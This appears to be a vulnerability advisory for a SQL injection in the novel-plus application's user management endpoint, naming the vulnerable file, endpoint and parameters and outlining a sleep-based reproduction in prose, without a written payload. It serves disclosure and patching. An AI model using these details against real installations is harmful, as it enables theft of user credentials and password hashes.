xxyopen Novel-Plus SQL Injection Vulnerability in User Management Module

A critical SQL injection vulnerability has been identified in the xxyopen/201206030 novel-plus application, affecting versions through 5.1.3. The vulnerability resides in the User Management Module, specifically within the UserMapper.xml file. The issue arises in the '/list' endpoint, where the 'sort' and 'order' parameters are improperly handled, allowing authenticated users to inject malicious SQL. This exploitation can lead to unauthorized access and exfiltration of sensitive data, including usernames, email addresses, and password hashes, from the 'sys_user' table.

Impact

Exploitation of this vulnerability allows for arbitrary SQL execution, enabling attackers to access and extract sensitive user information from the database, such as password hashes, which could compromise user accounts.

Reproduction

To reproduce this vulnerability, send a GET request to the '/sys/user/list' endpoint with crafted 'sort' and 'order' parameters that exploit the SQL injection flaw. The injected SQL can be used to, for example, delay the response by using a sleep command, demonstrating the injection capability.